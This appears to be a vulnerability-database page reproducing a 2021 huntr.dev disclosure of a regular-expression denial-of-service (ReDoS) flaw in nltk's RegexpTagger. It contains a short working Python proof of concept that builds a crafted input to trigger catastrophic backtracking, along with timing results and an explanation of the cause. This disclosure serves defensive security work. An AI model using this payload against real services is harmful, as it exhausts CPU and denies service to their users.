Lucene search

K
huntrScara31761A761E-2BE2-430A-8D92-6F74FFE9866A
HistoryDec 07, 2021 - 12:51 p.m.

Inefficient Regular Expression Complexity in nltk/nltk

2021-12-0712:51:51
scara31
www.huntr.dev
7

0.001 Low

EPSS

Percentile

34.6%

Description

nltk is vulnerable to ReDoS attack because of ^-?[0-9]+(.[0-9]+)?$ regex. If attacker succeeds to use malicious payload against RegexpTagger used in function get_pos_tagger and malt_regex_tagger, it will cause a nasty DoS.

Proof of Concept

// PoC.py
import re, time

pattern = re.compile("^-?[0-9]+(.[0-9]+)?$")
s = "-"
s += "0" * 50000
s += "q"

t = time.time()
print("searching...")
re.search(pattern, s)
print(time.time() - t)

On my new machine I needed only 50k characters to cause a 23+ seconds matching. For instance, in similar report to this project 160k characters were processed just in 3+ seconds.

Issue

The issue here is that in ^-?[0-9]+(.[0-9]+)?$ groups [0-9]+(.[0-9]+) match each other, which causes a nasty backtracking in case of failure.

Impact

This vulnerability is capable of causing DoS due to CPU resources consumption.

0.001 Low

EPSS

Percentile

34.6%

Related for 761A761E-2BE2-430A-8D92-6F74FFE9866A